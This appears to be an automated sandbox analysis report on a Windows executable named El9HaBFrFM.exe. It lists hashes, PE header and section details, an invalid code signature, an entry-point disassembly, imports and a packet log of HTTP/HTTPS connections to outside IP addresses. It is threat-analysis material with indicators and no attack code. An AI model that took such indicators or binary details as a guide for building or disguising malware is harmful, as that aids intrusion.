                                                                                                                                                                                                                                                                                                                      Preview:(function(){'use strict';var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this); .function da(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-1;d++){var f=a[d];if(!(f in c))break a;c=c[f]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}}da("Symbol.dispose",function(a){return a?a:Symbol("Symbol.dispose")});/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=this||self;function ea(a){m.setTimeout(()=>{throw a;},0)};var p,q;a:{for(var fa=["CLOSURE_FLAGS"],r=m,t=0;t<fa.length;t++)if(r=r[fa[t]],r==null){q=null;break
                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                      SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                                                                                                      MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                                                                                                      SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                                                                                                      SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                                                                                                      SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                                                      Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.993725451245003
                                                                                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                      File name:El9HaBFrFM.exe
                                                                                                                                                                                                                                                                                                                      File size:8'278'102 bytes
                                                                                                                                                                                                                                                                                                                      MD5:9500da3f633857c71861d6af33820c12
                                                                                                                                                                                                                                                                                                                      SHA1:8ecddcb17a72de8cc0a4f1bea277023cfe3f32ab
                                                                                                                                                                                                                                                                                                                      SHA256:cf691d4fccff15f697093ffc3b45d0e1c76725b701fb8f86ad39bcf444b770c6
                                                                                                                                                                                                                                                                                                                      SHA512:05fa9202d997648fadb4ad048e79c96c8b047e07dcd1881054428b2e9db35def361ce0b266582e63a9d303a4784f64d55c68067b00474737e112e3d3cb1c8324
                                                                                                                                                                                                                                                                                                                      SSDEEP:196608:bSHYKiwfI9jUCzi4H1qSiXLGVi7DMgpZ3Q0VMwICEc/jQ:MIHziK1piXLGVE4Ue0VJc
                                                                                                                                                                                                                                                                                                                      TLSH:54863301A68109F6F6EBDA3DD4D28419C47236A217A1DAEF132CD27A0DB31F95836773
                                                                                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d..
                                                                                                                                                                                                                                                                                                                      Icon Hash:0c1323131d2f0e00
                                                                                                                                                                                                                                                                                                                      Entrypoint:0x14000cdb0
                                                                                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                                      Digitally signed:true
                                                                                                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                      Time Stamp:0x6722508C [Wed Oct 30 15:28:12 2024 UTC]
                                                                                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                      Import Hash:72c4e339b7af8ab1ed2eb3821c98713a
                                                                                                                                                                                                                                                                                                                      Signature Valid:false
                                                                                                                                                                                                                                                                                                                      Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                                                                                                                                                                                      Not Before, Not After
                                                                                                                                                                                                                                                                                                                      • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                                                                                                                                                                                                                                                                                      Subject Chain
                                                                                                                                                                                                                                                                                                                      • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                                                                                                      Version:3
                                                                                                                                                                                                                                                                                                                      Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                                                                                                      Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                                                                                                      Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                                                                                                      Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                                                                                      call 00007FE748F9D36Ch
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                                                                                      jmp 00007FE748F9CF8Fh
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                                                                                      call 00007FE748F9D738h
                                                                                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                                                                                      je 00007FE748F9D133h
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                                                                      jmp 00007FE748F9D117h
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      cmp ecx, eax
                                                                                                                                                                                                                                                                                                                      je 00007FE748F9D126h
                                                                                                                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      cmpxchg dword ptr [0003577Ch], ecx
                                                                                                                                                                                                                                                                                                                      jne 00007FE748F9D100h
                                                                                                                                                                                                                                                                                                                      xor al, al
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                                                                      mov al, 01h
                                                                                                                                                                                                                                                                                                                      jmp 00007FE748F9D109h
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                                                                                      test ecx, ecx
                                                                                                                                                                                                                                                                                                                      jne 00007FE748F9D119h
                                                                                                                                                                                                                                                                                                                      mov byte ptr [00035765h], 00000001h
                                                                                                                                                                                                                                                                                                                      call 00007FE748F9C865h
                                                                                                                                                                                                                                                                                                                      call 00007FE748F9DB50h
                                                                                                                                                                                                                                                                                                                      test al, al
                                                                                                                                                                                                                                                                                                                      jne 00007FE748F9D116h
                                                                                                                                                                                                                                                                                                                      xor al, al
                                                                                                                                                                                                                                                                                                                      jmp 00007FE748F9D126h
                                                                                                                                                                                                                                                                                                                      call 00007FE748FAA66Fh
                                                                                                                                                                                                                                                                                                                      test al, al
                                                                                                                                                                                                                                                                                                                      jne 00007FE748F9D11Bh
                                                                                                                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                                                                                                                      call 00007FE748F9DB60h
                                                                                                                                                                                                                                                                                                                      jmp 00007FE748F9D0FCh
                                                                                                                                                                                                                                                                                                                      mov al, 01h
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                                                                                      inc eax
                                                                                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      sub esp, 20h
                                                                                                                                                                                                                                                                                                                      cmp byte ptr [0003572Ch], 00000000h
                                                                                                                                                                                                                                                                                                                      mov ebx, ecx
                                                                                                                                                                                                                                                                                                                      jne 00007FE748F9D179h
                                                                                                                                                                                                                                                                                                                      cmp ecx, 01h
                                                                                                                                                                                                                                                                                                                      jnbe 00007FE748F9D17Ch
                                                                                                                                                                                                                                                                                                                      call 00007FE748F9D6AEh
                                                                                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                                                                                      je 00007FE748F9D13Ah
                                                                                                                                                                                                                                                                                                                      test ebx, ebx
                                                                                                                                                                                                                                                                                                                      jne 00007FE748F9D136h
                                                                                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                                                                                      lea ecx, dword ptr [00035716h]
                                                                                                                                                                                                                                                                                                                      call 00007FE748FAA462h
                                                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3ca5c0x78.rdata
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x8408.rsrc
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x440000x2250.pdata
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x7e2c0e0x2448
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x500000x764.reloc
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0800x1c.rdata
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x39f400x140.rdata
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x4a0.rdata
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                                      .text0x10000x29f000x2a0002a7ae207b6295492e9da088072661752False0.5514439174107143data6.487454925709845IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                      .rdata0x2b0000x12a500x12c0017bdc256292477149c81bec0d706678cFalse0.5244791666666667data5.752654841959546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                      .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                                      .pdata0x440000x22500x2400f5559f14427a02f0a5dbd0dd026cae54False0.470703125data5.291665041994019IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                      .rsrc0x470000x84080x8600515874a0990ae218e4bbca91ff9bf425False0.9068913246268657data7.875595982945999IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                      .reloc0x500000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                                      RT_ICON0x472500x192PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.027363184079602
                                                                                                                                                                                                                                                                                                                      RT_ICON0x473e40x281PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0171606864274572
                                                                                                                                                                                                                                                                                                                      RT_ICON0x476680x391PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0120481927710843
                                                                                                                                                                                                                                                                                                                      RT_ICON0x479fc0x62fPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0069488313329122
                                                                                                                                                                                                                                                                                                                      RT_ICON0x4802c0x987PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.002870028700287
                                                                                                                                                                                                                                                                                                                      RT_ICON0x489b40x1a06PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced0.9707295106574603
                                                                                                                                                                                                                                                                                                                      RT_ICON0x4a3bc0x4706PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9569354306456935
                                                                                                                                                                                                                                                                                                                      RT_GROUP_ICON0x4eac40x68data0.7115384615384616
                                                                                                                                                                                                                                                                                                                      RT_VERSION0x4eb2c0x3ccdata0.4382716049382716
                                                                                                                                                                                                                                                                                                                      RT_MANIFEST0x4eef80x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                                                                                      USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                                                                                      COMCTL32.dll
                                                                                                                                                                                                                                                                                                                      KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                                                                                                                      ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                                                                                      GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.694618940 CET4973780192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.695514917 CET4973880192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.699734926 CET8049737160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.699804068 CET4973780192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.700411081 CET8049738160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.700473070 CET4973880192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.909230947 CET4973880192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.914231062 CET8049738160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.540455103 CET8049738160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.716296911 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.716331959 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.716398954 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.716593027 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.716604948 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.749731064 CET4973880192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.750243902 CET8049738160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.750329018 CET4973880192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.821947098 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.866102934 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.878721952 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.878730059 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.879798889 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.879864931 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.891510010 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.891583920 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.891702890 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.891710043 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.007121086 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.475735903 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.476463079 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.476526022 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.507060051 CET49741443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.507102013 CET44349741160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.776849031 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.776890039 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.776948929 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.777540922 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.777555943 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.793291092 CET49744443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.793335915 CET44349744160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.793407917 CET49744443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.793657064 CET49744443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:20.793684006 CET44349744160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.669298887 CET44349744160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.669301033 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.669631004 CET49744443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.669660091 CET44349744160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.669769049 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.669802904 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.670032978 CET44349744160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.670157909 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.671816111 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.671892881 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.672161102 CET49744443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.672231913 CET44349744160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.672734022 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.672954082 CET49744443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.715333939 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.715343952 CET44349744160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.743529081 CET49747443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.743580103 CET44349747142.250.185.228192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.743818998 CET49747443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.744543076 CET49747443192.168.2.4142.250.185.228
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.744561911 CET44349747142.250.185.228192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.942147017 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.942173958 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.942219019 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.942264080 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.942264080 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.942303896 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.943367004 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.977082014 CET49744443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.977197886 CET44349744160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.977300882 CET49744443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.047873020 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.047972918 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.048103094 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.085469007 CET49742443192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.085500002 CET44349742160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.110658884 CET49748443192.168.2.4160.153.155.187
